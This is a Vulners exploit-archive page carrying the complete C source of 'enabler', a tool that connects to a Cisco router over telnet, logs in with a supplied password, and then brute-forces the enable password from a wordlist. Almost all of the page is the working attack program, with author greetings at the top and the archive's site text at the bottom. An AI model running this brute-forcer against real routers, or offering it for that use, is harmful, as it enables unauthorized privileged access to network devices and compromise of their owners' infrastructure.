Vulners
Lucene search
Cisco Password Bruteforcer Exploit
/*
.: free source :. .: coded 4 Avatar Corp :.
enabler.
cisco internal bruteforcer.
coder - norby
concept - anyone
this program just logs into a CISCO router and tries a list of
passes looking for the enable one.
it works in password-only CISCO as well in login-pass ones and
has been succesfully tested on many 2600 and a few 12008.
the prog's concept [bruteforcing a router for gaining enable access]
is quite simple ...how amazing I haven't seen similar progs before!
anti eleet&0day force ;)
anyway... information wants to be free :)
sciao belli
saluti a berserker mandarine, acidcrash
beho x la traduzione :)
norby
saluti a *lei*, saluti a gabriella che a capodanno
non ha voluto lasciare il ragazzo x fare un bambino con me ;)
saluti a tutti gli avatar, a sandman, a tutte le diecimila
persone che conosco
any
saluti a Acida, storm\, Raid
contact` norby - [email protected] anyone - [email protected]
www.avatarcorp.org
neural collapse _ i truly hope in this project
v1 02/10/2k+1
todo for v2: use of threads, implement a passlist recovery
(very simple feature)
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#define BOX "\033[0m\033[34;1m[\033[0m\033[37;1m`\033[0m\033[34;1m]"
struct sockaddr_in addr;
char host[100];
struct hostent *hp;
int sock_stat;
int n,x;
char **password;
char resolve(char *inputhost) {
int a,b,c,d;
if (sscanf(inputhost,"%d.%d.%d.%d",&a,&b,&c,&d) !=4) {
hp = gethostbyname(inputhost);
if (hp == NULL) { printf("%s error on host resolving\n\033[0m\n", BOX); exit(0); }
sprintf(host,"%d.%d.%d.%d",(unsigned char)hp->h_addr_list[0][0],
(unsigned char)hp->h_addr_list[0][1],
(unsigned char)hp->h_addr_list[0][2],
(unsigned char)hp->h_addr_list[0][3]);
}
else { strncpy(host,inputhost,100); }
}
int sock(char *hostoresolve,int port) {
int err;
sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock_stat<0) { printf("%s error opening socket\n\033[0m\n", BOX); exit(0); }
addr.sin_family = PF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(host);
err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr));
if (err < 0) { printf("%s error opening connection\n\033[0m\n", BOX); exit(0); }
}
int banner() {
printf("\n%s enabler.\n", BOX);
printf("%s cisco internal bruteforcer. concept by anyone\n", BOX);
printf("%s coded by norby\n", BOX);
}
int usage(char *argv) { printf("%s usage: %s <ip> [-u user] <pass> <passlist> [port]\n\n\033[0m", BOX, argv); }
void sig() {
if(n>0) { printf("%s %i passwords tryed. no password matching. leaving\n",BOX,n); }
printf("\n\033[0m"); exit(0);
}
int login(char *login, char *pass) {
char *input = malloc(4000);
int reqlogin;
while (read (sock_stat, input, 4000) > 0) {
if(strstr(input,"ogin:")||strstr(input,"sername:")) {
if(!strcmp(login,"n0login")) {
printf("%s username needed... give me a username next time :)\n\n\033[0m", BOX);
exit(0);
}
printf("%s login requested. sending [%s] and [%s]\n", BOX, login, pass); reqlogin=1; break;
}
if(strstr(input,"assword:")) { printf("%s only password needed. sending [%s]\n", BOX, pass); reqlogin=0; break; }
bzero(input,4000);
}
if(reqlogin==1) {
write(sock_stat,login,strlen(login));
write(sock_stat,"\r\n",2);
while(read(sock_stat,input,4000)>0) {
if(strstr(input,"assword")); { break; }
}
}
write(sock_stat,pass,strlen(pass));
write(sock_stat,"\r\n",2);
sleep(2);
bzero(input,4000);
while (read (sock_stat, input, 4000) > 0) {
if(strstr(input,">")) { printf("%s seems we are logged in :)\n", BOX); break; }
/* if(strstr(input,"assword:")) {
printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0);
}*/
if(strstr(input,"sername:")) {
printf("%s sorry... [%s] is not a good password for login :?n\033[0m\n",BOX,pass); exit(0);
}
bzero(input,4000);
}
}
int loadwordlist(char *list) {
FILE *passlist;
char buf[32], fake;
int i,z;
if ((passlist = fopen(list, "r")) == NULL) {
printf("%s sorry, unable to open the passlist [%s]\n\033[0m\n", BOX,list);
exit(0);
}
(void)fseek(passlist, 0L, SEEK_END); // cazz questo e' uno smanettamento mentale
password = malloc(ftell(passlist)); // per fare allocare solo la memoria giusta x la passlist :P
if(password == NULL) {
printf("%s sorry, can't allocate memory for passlist. buy more ram or cut the passlist\n\033[0m\n",BOX);
exit(0);
}
(void)fseek(passlist, 0L, SEEK_SET);
while (!feof(passlist)) {
fgets(buf, 32, passlist);
if (buf[0] == '#' || buf[0] == '\n') continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n') buf[i] = '\0';
password[x] = malloc(32);
strcpy(password[x], buf);
memset(buf, 0, 32);
x++;
}
password[x] = 0x0;
fclose(passlist);
if(x<4) { printf("%s sorry, but passlist must contain at least 3 passwords. leaving \n\033[0m\n",BOX); exit(0); }
}
int brute() { // there is a stupid error... the last password is tryed 2 times... must be fixed... ;)
char *input = malloc(100);
int N;
bzero(input,100);
write(sock_stat,"enable",6);
write(sock_stat,"\r\n",2);
while(1) {
while(read(sock_stat,input,100)>0) {
if(n==x) { printf("%s %i passwords tried. no valid password found in the passlist\n\033[0m\n",BOX,n-1); exit(0); }
if(n+1==x) break;
if(strstr(input,"assword:")||strstr(input,"#")||strstr(input,">")) break;
bzero(input,100);
}
if(strstr(input,"#")) { printf("%s possible password found: %s\n\033[0m\n",BOX,password[n-1]); exit(0); }
if(strstr(input,"assword:")) {
write(sock_stat,password[n],strlen(password[n]));
write(sock_stat,"\r\n",2);
n++;
bzero(input,100);
if(n>1) printf("%s %s... wrong password\n", BOX, password[n-2]); fflush(stdout);
continue;
}
if(strstr(input,">")) {
write(sock_stat,"enable\r\n",8); bzero(input,100);
}
}
}
int main(int argc, char *argv[]) {
int port;
signal(SIGINT, sig);
banner();
if((argc<=3)||(argc>=8)) { usage(argv[0]); exit(0); }
if(!strcmp(argv[2],"-u")) {
if(argc==6) { port=atoi("23"); }
else { port=atoi(argv[6]); } // c'e' uno stupido errore qua di argc che nn ho voglia di trovare
// c'ho cosetta nella testa :?-- Corretto :)
printf("%s\n",BOX);
loadwordlist(argv[5]);
resolve(argv[1]);
sock(host, port);
login(argv[3],argv[4]);
brute();
}
else {
if(argc==4) { port=atoi("23"); }
else { port=atoi(argv[4]); }
printf("%s\n",BOX);
loadwordlist(argv[3]);
resolve(argv[1]);
sock(host, port);
login("n0login",argv[2]);
brute();
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Oct 2006 00:00Current
7.1High risk
Vulners AI Score7.1